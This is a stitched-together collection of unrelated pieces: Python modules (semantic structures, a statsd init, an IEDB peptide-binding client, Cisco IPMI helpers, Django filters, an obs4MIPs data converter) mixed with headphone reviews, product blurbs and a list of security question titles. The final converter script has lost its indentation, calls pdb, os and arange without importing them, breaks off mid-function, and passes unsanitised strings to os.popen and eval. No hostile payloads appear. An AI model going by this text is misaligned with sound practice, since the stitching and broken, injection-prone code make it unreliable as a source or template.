    def __repr__(self):
        # '?' stands in for an unknown/unspecified type.
        type_tag = '[{}]'.format(self.type or '?')
        return (f'<{type(self).__name__} object '
                f'({self.id}:{self.predicate}{self.lnk}{type_tag}) '
                f'at {id(self)}>')
# Structure types

# A flat sequence of predications as held by a SemanticStructure
Predications = Sequence[Predication]
# A predication slot that may be unfilled
MaybePredication = Union[Predication, None]
# A (quantifiee, quantifier) pairing; either member may be None
PredicationPair = Tuple[MaybePredication, MaybePredication]
class SemanticStructure(LnkMixin):
    """
    A basic semantic structure.

    DELPH-IN-style semantic structures are rooted DAGs with flat lists
    of predications.

    Args:
        top: identifier for the top of the structure
        predications: list of predications in the structure
        identifier: a discourse-utterance identifier
    Attributes:
        top: identifier for the top of the structure
        predications: list of predications in the structure
        identifier: a discourse-utterance identifier
    """

    __slots__ = ('top', 'predications', 'identifier', '_pidx')

    def __init__(self,
                 top: Optional[Identifier],
                 predications: Predications,
                 lnk: Optional[Lnk],
                 surface,
                 identifier):
        super().__init__(lnk, surface)
        self.top = top
        self.predications = predications
        self.identifier = identifier
        # Index by id for O(1) membership tests and lookups.
        self._pidx = {p.id: p for p in predications}

    def __repr__(self):
        preds = ' '.join(p.predicate for p in self.predications)
        return f'<{type(self).__name__} object ({preds}) at {id(self)}>'

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return (self.top == other.top
                    and self.predications == other.predications)
        return NotImplemented

    def __contains__(self, id):
        return id in self._pidx

    def __getitem__(self, id):
        return self._pidx[id]

    def arguments(self, types=None, expressed=None) -> ArgumentStructure:
        """
        Return a mapping of the argument structure.

        Args:
            types: an iterable of predication types to include
            expressed: if `True`, only include arguments to expressed
                predications; if `False`, only include those
                unexpressed; if `None`, include both
        Returns:
            A mapping of predication ids to lists of (role, target)
            pairs for outgoing arguments for the predication.
        """
        raise NotImplementedError()

    def properties(self, id: Identifier) -> PropertyMap:
        """Return the morphosemantic properties for *id*."""
        raise NotImplementedError()

    def is_quantifier(self, id: Identifier) -> bool:
        """Return `True` if *id* represents a quantifier."""
        raise NotImplementedError()

    def quantification_pairs(self) -> List[PredicationPair]:
        """
        Return a list of (Quantifiee, Quantifier) pairs.

        Both members of each pair are :class:`Predication` objects,
        unless they do not quantify or are not quantified by anything,
        in which case they are `None`. In well-formed and complete
        structures, the quantifiee will never be `None`.

        Example:
            >>> [(p.predicate, q.predicate)
            ...  for p, q in m.quantification_pairs()]
            [('_dog_n_1', '_the_q'), ('_bark_v_1', None)]
        """
        raise NotImplementedError()
|
Sony WH-CH500 Wireless Bluetooth NFC On-Ear Headphones : The Best Budget Headphones !
These headphones are truly amazing — the best bass, lows and highs; honestly, these are the best pair of Bluetooth headphones I have ever owned. They are very lightweight and have a good fit, so they don’t fall off. If you are someone who commutes to work by walking, bus or train, these are definitely for you. The sound is very punchy, and they look very stylish yet discreet in all three colours.
Did a lot of research and found i kept coming back to these as a present for my wife who had described what she would like. If i have one problem with the it’s struggling to say anything to her as she walk she around the house with them on her head. Good duration between charges, easy to use, pairs with your audio with no problem and she really likes the sound quality. I think they’ve been a good buy. Luckily i also found a blue case to go with them elsewhere on amazon so they can go travelling too without any problem though they don’t take up much space when folded.
These are good, inexpensive basic over ear headphones. They don’t deliver the greatest sound quality but are perfectly good for my intended use (pc for streaming video, podcasts/music whilst dog walking with iphone 6). Paired easily with my pc and iphone. Would recommend as a basic set – pay more for a better set if that’s what you want.
I normally buy expensive headphones because i expect good quality for the price but after my second pair of bowers and wilkins p7’s failed after 2 months use i gave up and went back to the only headphone make that i have never had problems with. I had a 4 year old set of sony headphones years back and only got rid of because the cups wore out. The cups hold in place well and the battery lasts plenty of hours.
The headphones were delivered quickly and nicely packaged. They look nice and feel like good quality. I particularly like that both earpiece can we turned to make the whole unit flat (good for travel). Very easy to connect and sound quality is good. However, they are not very comfortable. The top part is not completely smooth so start hurting the top of your head after a while and the earpieces are a little on the small side so that after long wear it hurt your ear as the padding sits on the edges of your ears and start pressing.
I thought by spending 2-3 times more than the non popular brands, ie relatively unknown chinese brands, you would get a compelling product. But no, they still sound barely ok and have no life in the audio. Save yourself some time and money and either get something like the august ep650 or just spend the big bucks and get the usual high quality expensive stuff if you are going to listen to lots of audio.
I bought these headphones as my workout headphones as i don’t want to damage my main headphones bose qc35 ii. So i am comparing these to a £250 pair of headphones, which is something to bear in mind. Build quality – average – cheap plastically look and feel but the all-black colour hides this somewhat. The buttons are very cheap, feel like they will only work 50% of the time (but they do work all the time)sounds quality – happily surprised – the sound quality is pretty good, even when i’m comparing it to my bose.The sound range is great, the base is pretty good and i didn’t find anything that made me think ‘that was bad’. There is no noise canceling, but that is what i desired as i wear them when running and still want to be aware of surrounding. Fit – takes some getting used to – they are pretty tight and they are on-the-ear, so won’t cover the whole ear. It takes some getting use to/adjusting to find that sweet spot, but they are very secure on the head (perfect for exercise)overall, pretty good headphones, i wouldn’t pay over £40 for these, but they provide good sound quality, but they are a budget built headphone.
I bought these as i wear hearing aids, and am unable to wear conventional ones.
Product Description, Connect, listen, enjoy and indulge in a seamless personal audio experience with the Sony WH-CH500 wireless headphones. Enjoy detailed and dynamic sound from 30 mm dome drivers, combined with the freedom of wireless connectivity. You can now listen for even longer with up to 20 hours wireless playback and the sleek, swivel fold design not only delivers a minimalist style, but also makes them easy to fold and store, perfect for travel. There’s also a high quality built-in microphone, enabling hands free voice calls without the need to access your phone. With the press of one button you can activate the Google Assistant or Siri from your smart phone, so you can ask questions and receive answers directly through your headphones.
Wirelessly stream your favourite tracks with a Bluetooth connection. Pair your smartphone or tablet with these headphones wirelessly, and you can enjoy your music and even control playlists and volume right from your headphones.
Near Field Communication (NFC) technology makes complex set-up sequences a thing of the past. Simply touch selected NFC-enabled devices to the on-body N-mark for a quick, seamless connection, then start streaming content via Bluetooth connection. No NFC? No problem. You can still manually make a Bluetooth connection using your device’s settings menu.
Keep your tunes playing throughout the day. A built-in Li-ion battery delivers up to 20 hours of power in wireless and is rechargeable via Micro USB.
Take these headphones anywhere you go. A swivel design makes it simple and safe to store them when you’re on the move. The earcups swivel flat for easy packing in a suitcase or slipping into a bag.
Enjoy more of the detail in all your favourite songs thanks to 30 mm dome drivers, which deliver dynamic sound from compact, lightweight units.
Select and wear the colour that suits you best. Choose from black, grey or blue.
I’m speechless at how a set of Bluetooth headphones can sound like this. My problem in the past with earphones was that you didn’t have enough power to drive them. These are on another level — I can’t put it into words. I have a few pairs of wired Sennheisers, and although these may not be as good, they blow everything out of the water for under a hundred quid. I’m gobsmacked; these are amazing.
My partner, our son and I all have these headphones. After getting these headphones for my partner for Christmas, my son then begged to get a pair. Both using them for gym and boxing, they have been beaming with joy that not only do they stay on when doing cardio but the sound quality is superb. The battery life is pretty good too and very fast to charge :) Would definitely recommend them to anyone looking for wireless headphones.
Stunning, comfortable and great sound quality. I use them all the time and they are perfect for the gym as well which was exactly what i was looking for. (had to return another pair recently because they were bigger and looser, especially when moving around. But these are perfect)the only downside is that when the volume is up, it actually comes out so people around me can hear it. Not a big fan of it, but i can live with it. So definitely worth 5 stars.
Possibly the best thing i’ve bought from amazon – straight up – these compact headphones have excellent sound quality, really easy to pair, very comfy on the ear and with an overnight charge you will have boombastic sounds all day. Highly recommended purchase.
The sound is great but unfortunately is not a very good fit around the ears and is very loose on the head and tends to fall off when bending over to pick up something. You’ll need to be fast and a good catcher to stop it hitting the floor.
I think these are good value for money if you’re on a budget but i decided to pay a little more for a more premium pair. I ended up returning these headphones because they were uncomfortable for me and the plastic they’re made of looked flimsy. I can’t speak of the battery life and sound quality because i didn’t really use them before returning. Would recommend buying these if you’re not willing to pay more for a pair.
Can not connect to the TV via Bluetooth. Not compatible. This headphone is also not compatible with a TV, this is only possible from the series WHH900N / Wh1000X.
|
from statsd.connection import Connection
from statsd.client import Client
from statsd.timer import Timer
from statsd.gauge import Gauge
from statsd.average import Average
from statsd.raw import Raw
from statsd.counter import Counter, increment, decrement
# Public API of the statsd package.
__all__ = [
    'Client',
    'Connection',
    'Timer',
    'Counter',
    'Gauge',
    'Average',
    'Raw',
    'increment',
    'decrement',
]

# The doctests in this package, when run, will try to send data on the wire.
# To keep this from happening, we hook into nose's machinery to mock out
# `Connection.send` at the beginning of testing this package, and reset it at
# the end.

# Holds the active mock.patch object between setup_package() and
# teardown_package(); None when no patch is installed.
_connection_patch = None
def setup_package():
    """Patch out Connection.send for the duration of this package's tests."""
    # mock is only needed during testing, so import it here instead of
    # making it a global requirement of the package.
    import mock

    global _connection_patch
    _connection_patch = mock.patch('statsd.Connection.send')
    mocked_send = _connection_patch.start()
    mocked_send.return_value = True
def teardown_package():
    """Undo the Connection.send patch installed by setup_package()."""
    # setup_package() must have run first, otherwise there is no patch.
    assert _connection_patch
    _connection_patch.stop()
|
Our health is our most important attribute. Without it, we can’t do much else in life. Staying healthy can be a challenge and we can’t predict or control if or when we get sick. However, there are things we can do to improve our quality of life.
Medical science is helpful for injuries and illness, but it can also be incredibly intrusive and pump our bodies full of chemicals. Taking a natural approach and finding ways for the body to heal itself is the least intrusive way for a person to overcome illness and injury and stay healthy.
We want to help you feel better. We’ll take the time to do a full body diagnosis and get to know you from every angle. We’ll create a treatment program that will work for you and with you to get you to optimum health and keep you there.
|
# Copyright (c) 2014. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib2
import urllib
from StringIO import StringIO
import logging
import re
import pandas as pd
from mhc_common import normalize_hla_allele_name, seq_to_str, convert_str
from peptide_binding_measure import (
IC50_FIELD_NAME, PERCENTILE_RANK_FIELD_NAME
)
"""
A note about prediction methods, copied from the IEDB website:
The prediction method list box allows choosing from a number of MHC class I
binding prediction methods:
- Artificial neural network (ANN),
- Stabilized matrix method (SMM),
- SMM with a Peptide:MHC Binding Energy Covariance matrix (SMMPMBEC),
- Scoring Matrices from Combinatorial Peptide Libraries (Comblib_Sidney2008),
- Consensus,
- NetMHCpan.
IEDB recommended is the default prediction method selection.
Based on availability of predictors and previously observed predictive
performance, this selection tries to use the best possible method for a given
MHC molecule. Currently for peptide:MHC-I binding prediction, for a given MHC
molecule, IEDB Recommended uses the Consensus method consisting of ANN, SMM,
and CombLib if any corresponding predictor is available for the molecule.
Otherwise, NetMHCpan is used. This choice was motivated by the expected
predictive performance of the methods in decreasing order:
Consensus > ANN > SMM > NetMHCpan > CombLib.
"""
# Prediction method identifiers accepted by the IEDB web API's "method"
# field (described in the module docstring above).
VALID_IEDB_METHODS = [
    'recommended',
    'consensus',
    'netmhcpan',
    'ann',
    'smmpmbec',
    'smm',
    'comblib_sidney2008'
]
def _parse_iedb_response(response):
    """
    Parse the tab-separated binding predictions returned by IEDB's
    web API into a DataFrame.
    """
    lines = response.split("\n")
    # Parse by hand rather than with pandas' readers: the first line is
    # the header, every following non-empty line is one record.
    header_names = lines[0].split("\t")
    columns = dict((name, []) for name in header_names)
    for line in lines[1:]:
        line = line.strip()
        if not line:
            continue
        fields = line.split('\t')
        for i, header_name in enumerate(header_names):
            # Short rows are padded with None before conversion.
            raw = fields[i] if len(fields) > i else None
            columns[header_name].append(convert_str(raw))
    return pd.DataFrame(columns)
def _query_iedb(request_values, url):
    """
    POST a prediction request to IEDB's web API and parse the response
    into a DataFrame.

    The request dictionary carries the fields:
    - "method"
    - "length"
    - "sequence_text"
    - "allele"
    """
    encoded = urllib.urlencode(request_values)
    request = urllib2.Request(url, encoded)
    raw_response = urllib2.urlopen(request).read()
    return _parse_iedb_response(raw_response)
class IEDB_MHC_Binding_Predictor(object):
    """Base class for MHC binding predictors backed by IEDB's web API.

    Subclasses supply the endpoint URL and default peptide lengths
    (see IEDB_MHC1 and IEDB_MHC2 below).
    """

    def __init__(
            self,
            alleles,
            lengths,
            method,
            url):
        # alleles and lengths must be sequences so they can later be
        # joined into the comma-separated strings the IEDB API expects.
        assert isinstance(alleles, (list,tuple)), \
            "Alleles must be a sequence, not: %s" % alleles
        self._alleles = alleles
        assert isinstance(lengths, (list,tuple)), \
            "Peptide lengths must be a sequence, not: %s" % (lengths,)
        assert all(isinstance(l, (int,long)) for l in lengths), \
            "Not all integers: %s" % (lengths,)
        self._lengths = lengths
        assert method in VALID_IEDB_METHODS, \
            "Invalid IEDB MHC binding prediction method: %s" % (method,)
        self._method = method
        self._url = url

    def _get_iedb_request_params(self, sequence, allele=None):
        """Build the POST parameter dict for one IEDB request."""
        # sometimes we can get joint predictions for all alleles
        if allele is None:
            allele = seq_to_str(self._alleles)

        params = {
            "method" : seq_to_str(self._method),
            "length" : seq_to_str(self._lengths),
            "sequence_text" : sequence,
            "allele" : allele,
        }
        return params

    def predict(self, data):
        """
        Given a dataframe with long amino acid sequences in the
        'SourceSequence' field, return an augmented dataframe
        with shorter k-mers in the 'Epitope' column and several
        columns of MHC binding predictions with names such as 'percentile_rank'
        """
        # take each mutated sequence in the dataframe
        # and generate MHC binding scores for all k-mer substrings
        responses = {}
        for i, peptide in enumerate(data.SourceSequence):
            for allele in self._alleles:
                # cache one IEDB call per (peptide, allele) pair
                key = (peptide, allele)
                if key not in responses:
                    request = self._get_iedb_request_params(peptide, allele)
                    logging.info(
                        "Calling IEDB (%s) with request %s",
                        self._url,
                        request)
                    response_df = _query_iedb(request, self._url)
                    # rename IEDB's column names to this project's
                    # conventions
                    response_df.rename(
                        columns={
                            'peptide': 'Epitope',
                            'length' : 'EpitopeLength',
                            'start' : 'EpitopeStart',
                            'end' : 'EpitopeEnd',
                            'allele' : 'Allele',
                        },
                        inplace=True)
                    # IEDB positions are 1-based; shift to 0-based
                    response_df['EpitopeStart'] -= 1
                    response_df['EpitopeEnd'] -= 1
                    responses[key] = response_df
                else:
                    logging.info(
                        "Already made predictions for peptide %s with allele %s",
                        peptide,
                        allele)

        # concatenating the responses makes a MultiIndex with two columns
        # - SourceSequence
        # - index of epitope from that sequence's IEDB call
        #
        # ...when we reset the index, we turn these into two columns
        # named 'level_0', and 'level_1'. We want to rename the former
        # and delete the latter.
        responses = pd.concat(responses).reset_index()
        responses['SourceSequence'] = responses['level_0']
        del responses['level_0']
        del responses['level_1']

        # IEDB has inclusive end positions, change to exclusive
        responses['EpitopeEnd'] += 1

        # NOTE(review): these asserts assume the 'ann' method columns are
        # always present in the response — confirm for non-ANN methods.
        assert 'ann_rank' in responses, responses.head()
        responses[PERCENTILE_RANK_FIELD_NAME] = responses['ann_rank']
        assert 'ann_ic50' in responses, responses.head()
        responses[IC50_FIELD_NAME] = responses['ann_ic50']

        # instead of just building up a new dataframe I'm expliciting
        # dropping fields here to document what other information is available
        drop_fields = (
            'seq_num',
            'method',
            'ann_ic50',
            'ann_rank',
            'consensus_percentile_rank',
            'smm_ic50',
            'smm_rank',
            'comblib_sidney2008_score',
            'comblib_sidney2008_rank'
        )
        for field in drop_fields:
            if field in responses:
                responses = responses.drop(field, axis = 1)

        result = data.merge(responses, on='SourceSequence')

        # some of the MHC scores come back as all NaN so drop them
        result = result.dropna(axis=1, how='all')
        return result
class IEDB_MHC1(IEDB_MHC_Binding_Predictor):
    """MHC class I binding predictor using IEDB's web API.

    Args:
        alleles: sequence of MHC allele names
        lengths: sequence of peptide lengths to predict for; the default
            is a tuple to avoid the shared-mutable-default pitfall
            (the base class accepts list or tuple)
        method: one of VALID_IEDB_METHODS
        url: IEDB MHC class I endpoint
    """

    def __init__(self,
                 alleles,
                 lengths=(9,),
                 method='recommended',
                 url='http://tools.iedb.org/tools_api/mhci/'):
        IEDB_MHC_Binding_Predictor.__init__(
            self,
            alleles=alleles,
            lengths=lengths,
            method=method,
            url=url)
class IEDB_MHC2(IEDB_MHC_Binding_Predictor):
    """MHC class II binding predictor using IEDB's web API."""

    def __init__(self,
                 alleles,
                 method='recommended',
                 url='http://tools.iedb.org/tools_api/mhcii/'):
        # Tuple default avoids a module-level mutable constant.
        IEDB_MHC_Binding_Predictor.__init__(
            self,
            alleles=alleles,
            lengths=(15,),
            method=method,
            url=url)

    def _get_iedb_request_params(self, sequence, allele=None):
        """Build the POST parameter dict for one MHC class II request.

        The class II endpoint takes no "length" field, so this override
        omits it.
        """
        # BUG FIX: the base class's predict() calls this method with an
        # explicit allele argument; the previous override only accepted
        # `sequence` and therefore raised TypeError when predict() ran.
        if allele is None:
            allele = seq_to_str(self._alleles)

        params = {
            "method" : seq_to_str(self._method),
            "sequence_text" : sequence,
            "allele" : allele,
        }
        return params
|
Demon WP Insecticide is an advanced formulation taking advantage of Cypermethrin. Demon WP Insecticide is an advanced-generation Pyrethroid that provides excellent control at extremely low concentrations. Demon WP Insecticide is an odorless wettable powder in water-soluble packets (2 packets/bag). Demon WP takes command of roaches and other major insects inside the home, delivering quick knock-down and fast flushing while providing excellent residual control.
|
# Copyright 2016 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements all the communication services
"""
from imcsdk.mometa.comm.CommIpmiLan import CommIpmiLan
from imcsdk.imccoreutils import get_server_dn, IMC_PLATFORM
def _get_comm_mo_dn(handle, server_id=1):
    """
    Internal method to get the IPMI mo's parent_dn based \
    on the type of platform
    """
    from imcsdk.imcexception import ImcValidationException

    platform = handle.platform
    if platform == IMC_PLATFORM.TYPE_CLASSIC:
        return "sys/svc-ext"
    if platform == IMC_PLATFORM.TYPE_MODULAR:
        # Modular (C3260) platforms scope the dn to a specific server.
        return get_server_dn(handle, server_id) + "/svc-ext"
    raise ImcValidationException("Invalid platform detected:%s" %
                                 platform)
def ipmi_enable(handle, priv=None, key=None, server_id=1):
    """
    Enable IPMI over LAN.

    Args:
        handle (ImcHandle)
        priv (string): Optional privilege level: 'admin', 'user', 'read-only'
        key (string): Optional encryption key as hexadecimal string
        server_id (int): Server Id to be specified for C3260 platforms

    Returns:
        CommIpmiLan object

    Raises:
        ValueError if privilege or key are invalid

    Example:
        if ipmi_enable(handle):
            print "IPMI Enabled"
    """
    # Verify key is a hex number
    try:
        if key:
            int(key, 16)
    except ValueError:
        # BUG FIX: previously `.format()` was applied only to the second
        # string literal of a '+' concatenation, so the '{0}' placeholder
        # was never substituted in the raised message.
        raise ValueError('{0}: ERROR: Encryption key is not hex number: '
                         '"{1}"'.format(handle.ip, key))

    # Create enabled IPMI object
    mo = CommIpmiLan(parent_mo_or_dn=_get_comm_mo_dn(handle, server_id))
    mo.admin_state = "enabled"
    mo.priv = priv
    mo.key = key

    # Configure IPMI object on CIMC
    handle.set_mo(mo)
    return mo
def ipmi_disable(handle, server_id=1):
    """
    Disable IPMI over LAN.

    Args:
        handle (ImcHandle)
        server_id (int): Server Id to be specified for C3260 platforms

    Returns:
        CommIpmiLan object
    """
    # Build an IPMI object in the disabled state and push it to CIMC.
    ipmi_mo = CommIpmiLan(parent_mo_or_dn=_get_comm_mo_dn(handle, server_id))
    ipmi_mo.admin_state = "disabled"
    handle.set_mo(ipmi_mo)
    return ipmi_mo
def ipmi_exists(handle, server_id=1, **kwargs):
    """
    Check if IPMI over LAN is enabled

    Args:
        handle (ImcHandle)
        server_id (int): Server Id to be specified for C3260 platforms

    Returns:
        True/False, MO/None
    """
    dn = CommIpmiLan(parent_mo_or_dn=_get_comm_mo_dn(handle, server_id)).dn
    mo = handle.query_dn(dn)
    if mo is None:
        return False, None

    # An existing MO only counts if it is enabled and also matches any
    # extra property filters supplied by the caller.
    kwargs['admin_state'] = "enabled"
    return (mo.check_prop_match(**kwargs), mo)
|
Gale databases curated for our school! InfoBits covers a broad range of topics and includes images, articles from encyclopedias, magazines, and the news. National Geographic Kids includes topics on science, nature and space with videos and articles.
|
# -*- coding: utf-8 -*-
from django import template
from core.utils import duration_parts, duration_string as d_string
register = template.Library()
@register.filter
def duration_string(duration, precision='s'):
    """
    Format a duration (e.g. "2 hours, 3 minutes, 35 seconds").

    :param duration: a timedelta instance.
    :param precision: the level of precision to return (h for hours, m for
                      minutes, s for seconds)
    :returns: a string representation of the duration.
    """
    if duration:
        try:
            return d_string(duration, precision)
        except (ValueError, TypeError):
            pass
    # Falsy or unformattable durations render as an empty string.
    return ''
@register.filter
def hours(duration):
    """
    Return the "hours" portion of a duration.

    :param duration: a timedelta instance.
    :returns: an integer representing the number of hours in duration.
    """
    if duration:
        try:
            # duration_parts returns (hours, minutes, seconds).
            return duration_parts(duration)[0]
        except (ValueError, TypeError):
            pass
    return 0
@register.filter
def minutes(duration):
    """
    Return the "minutes" portion of a duration.

    :param duration: a timedelta instance.
    :returns: an integer representing the number of minutes in duration,
        or 0 for a falsy or unparseable value.
    """
    if duration:
        try:
            # duration_parts returns (hours, minutes, seconds).
            return duration_parts(duration)[1]
        except (ValueError, TypeError):
            pass
    return 0
@register.filter
def seconds(duration):
    """
    Return the "seconds" portion of a duration.

    :param duration: a timedelta instance.
    :returns: an integer representing the number of seconds in duration,
        or 0 for a falsy or unparseable value.
    """
    if duration:
        try:
            # duration_parts returns (hours, minutes, seconds).
            return duration_parts(duration)[2]
        except (ValueError, TypeError):
            pass
    return 0
|
Why do people say that PHP is inherently insecure?
Are there any “real world” implementations of secret-sharing encryption schemes?
What kind of encryption is a one-time pad?
How should passwords be stored if they must be recoverable?
What common products use Public-key cryptography?
What are the biggest unsolved problems in IT Security?
Is there an organization that reviews/approves crypto implementations?
Do security questions subvert passwords?
Ingress and Pokémon GO collect a lot of data - what impact could this have on my privacy or security?
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import cdms2
import cdtime
import cmor
import sys
import getopt
import factory
import numpy
from factory.formats import import_equation
from Toolbox.ESGFresources import *
from Toolbox.ESGFexcel import *
from Toolbox.CMORresources import CMORTable
# ************************************************************************
# process()
#
# Convert to obs4MIPS file format.
# ************************************************************************
def process( rc ):
'''
Convert netcdf/matlab/grads files into CMIP5 format.
'''
pdb.set_trace()
# ----------------------------
# Loop yearly on file list.
# ----------------------------
file_template = rc['file_template'].split(",");
if( len(file_template) == 2 ):
template_parameter = file_template[1]
rc['file_template'] = file_template[0]
else:
template_parameter = 'years'
for year in rc[template_parameter].split(","):
if(year == ''):
files= os.popen( "ls " + rc['file_template'] ).readlines()
else:
# ------------------------------------------------
# Use string formating for path with same argument
# ------------------------------------------------
try:
tmplFile = rc['file_template'] % (year)
except:
tmplFile = rc['file_template'].format(year)
if( not os.path.isfile( tmplFile) ) :
print "**** Warning %s not found\n" % ( tmplFile )
continue
files= os.popen( "ls " + tmplFile).readlines()
if( files == [] ):
print "No file found: Check your resource file"
return -1
# ------------------------------------------------
# Get the right handler to manage this file format
# ------------------------------------------------
Handler = factory.HandlerFormats(files[0].strip())
# -----------------------------------
# Take care of cmor initialization.
# -----------------------------------
cmor.setup(inpath=rc['inpath'],
netcdf_file_action = cmor.CMOR_REPLACE)
cmor.dataset(experiment_id = rc['experiment_id'],
institution = rc['institution' ],
calendar = rc['calendar' ],
institute_id = rc['institute_id' ],
model_id = rc['model_id' ],
source = rc['source' ],
contact = rc['contact' ],
references = rc['references' ])
# -----------------------------------------
# add extra Global Attributes for obs4MIPs.
# -----------------------------------------
cmor.set_cur_dataset_attribute( 'instrument', rc['instrument' ])
cmor.set_cur_dataset_attribute( 'mip_specs', rc['mip_specs' ])
cmor.set_cur_dataset_attribute( 'data_structure', rc['data_structure'])
cmor.set_cur_dataset_attribute( 'source_type', rc['source_type' ])
cmor.set_cur_dataset_attribute( 'source_id', rc['source_id' ])
cmor.set_cur_dataset_attribute( 'realm', rc['realm' ])
cmor.set_cur_dataset_attribute( 'obs_project', rc['obs_project' ])
cmor.set_cur_dataset_attribute( 'processing_version',
rc['processing_version'] )
cmor.set_cur_dataset_attribute( 'processing_level',
rc['processing_level'] )
cmor.load_table(rc['table'])
# ---------------------------------------------------------------------
# We loop on each file found, a new cmor file will be create on each
# iteration. If you want to aggregate, you need to use Grads ctl file
# or NeCDF list of file.
# ---------------------------------------------------------------------
for file in files:
fnm=file.strip() # Get rid of \n
aVariable = eval(rc['original_var'])
nbVariable = len(aVariable)
# -----------------------------------------------------
# ECMWF needs synoptic time 00z and 12z in he filename.
# We extract it from the first file in the list.
# -----------------------------------------------------
if( rc['source_fn'] == 'SYNOPTIC' ):
index = fnm.find('z.')
rc['SYNOPTIC'] = fnm[index-2:index]
# -----------------------
# Work on all variables
# -------------------------
for j in arange(nbVariable):
# ----------------------------------------------------
# Fetch the variable directly or excute equation.
# ----------------------------------------------------
try:
variable=aVariable[j]
Handler.open(fnm, variable=variable)
rc['cvrt_original_var'] = aVariable[j]
print "Working on variable %s " % variable
except:
if( aVariable[j] != 'equation' ) :
print "Variable %s can't open" % variable
continue
else:
print "Executing %s " % eval(rc['equation'])[j]
# pdb.set_trace()
rc['cvrt_original_units'] = eval(rc['original_units'])[j]
rc['cvrt_cmor_var'] = eval(rc['cmor_var'])[j]
rc['cvrt_equation'] = eval(rc['equation'])[j]
rc['cvrt_level'] = eval(rc['level'])[j]
data=Handler.getData()
# ----------------------------------------------------------
# Evaluate equation if needed. Usually used to change units
# ----------------------------------------------------------
if( rc['cvrt_equation'][0] == '@' ):
fncName = rc['cvrt_equation'][1:]
fnc = import_equation( "equations.%s" % fncName )
data[:]= fnc(Handler)
else:
data[:]=eval(rc['cvrt_equation'])
# -------------------------------------------------------------
# Save filled value in case data type is changed in createAxes
# -------------------------------------------------------------
fill_value = data.fill_value
# ---------------------------------------------
# Extract latitude/longitude
# ---------------------------------------------
lonvals=Handler.getLongitude()
latvals=Handler.getLatitude()
# ---------------------
# Create cmor time axis
# ----------------------
(rel_time, rel_time_bnds) = createTime(Handler, rc)
# ---------------------------------------------------
# Create cmor axes and add an axis to data if needed
# ---------------------------------------------------
(axes, data) = createAxes( rc, latvals, lonvals, data )
axis_ids = list()
for axis in axes:
axis_id = cmor.axis(**axis)
axis_ids.append(axis_id)
# ----------------------------------------------------------
# Create cmor variable
# Note: since this is in the loop, a new cmor file will be
# create for each cmor write command.
# ----------------------------------------------------------
varid = cmor.variable(table_entry = rc['cvrt_cmor_var'],
axis_ids = axis_ids,
history = '',
missing_value = fill_value,
original_name = rc['cvrt_original_var'],
units = rc['cvrt_original_units']
)
# -------------------------------
# Write data for this time frame.
# -------------------------------
cmor.write(varid,data,\
time_vals=rel_time,time_bnds=rel_time_bnds)
cmor.close(varid,file_name=True)
# ---------------------------------------
# Rename cmor files according to project.
# ---------------------------------------
if( movefiles(rc) ):
return -2
cmor.close()
return 0
# ********************************************************************
#
# createTime()
#
# Define Time and Time bound axes for cmor
#
# ********************************************************************
def createTime(Handler, rc):
    '''
    Define Time and Time bound axes for cmor.

    InputtimeUnits: specified from resource file or from first file
    in a list of file.
    Returns relative time values and time bounds using OutputTimeUnits
    from the resource file.
    '''
    # ----------------------------------------------------
    # Retrieve time units from file if not provided in the
    # resource file.
    # ----------------------------------------------------
    InputTimeUnits = Handler.getTimeUnits(rc['InputTimeUnits'])
    # --------------------------------------------------------
    # Create time relative to January 1st 1900 to facilitate
    # Thredds software file handling.
    # -------------------------------------------------------
    cur_time = Handler.getTime(InputTimeUnits)
    rel_time = [cur_time[i].torel(rc['OutputTimeUnits']).value
                for i in range(len(cur_time))]
    if( len(rel_time) == 1 ):
        # Single time step: assume a unit-width bound.
        deltarel = 1
    else:
        # Spacing between the last two steps; assumes a regular time axis.
        # (The original computed rel_time[2] - rel_time[1], which raised
        # IndexError for a two-element time axis.)
        deltarel = rel_time[-1] - rel_time[-2]
    # Bounds are the time values themselves plus one trailing edge.
    rel_time_bnds = rel_time[:]
    rel_time_bnds.append(rel_time[-1] + deltarel)
    return rel_time, rel_time_bnds
# ********************************************************************
#
# getCMIP5lev()
#
# Extract CMIP5 mandatory level and recreate a new data array.
# They are 16 mandatory levels.
#
# ********************************************************************
def getCMIP5lev(data,rc):
    '''
    Extract the CMIP5 mandatory pressure levels from *data* and return a
    new array regridded onto them (there are 16 mandatory levels).
    Returns *data* unchanged when the CMOR table defines no levels.
    '''
    oTable = CMORTable(rc['inpath'], rc['table'], "plevs")
    # ----------------------
    # Extract specified levels
    # ----------------------
    if( 'levels' in oTable.dico.keys() ):
        #pdb.set_trace()
        dataLevels = data.getLevel()[:]
        if( data.getLevel().units == "millibars" or
            data.getLevel().units == "hPa" or
            data.getLevel().units == "mbar" ):
            # --------------------------
            # Change units to Pascal
            # ---------------------------
            LevelScaleFactor = 100
            dataLevels = data.getLevel()[:] * LevelScaleFactor
        # NOTE(review): LevelScaleFactor is only bound in the branch above;
        # if the input level units are none of millibars/hPa/mbar, the
        # references below raise NameError -- confirm whether inputs are
        # always hPa-like.
        # ----------------------------------------
        # No level selected, return all data array
        # ----------------------------------------
        if( len(rc['cvrt_level'].split(":")) == 1 ):
            levels = [ float(item) for item in dataLevels ]
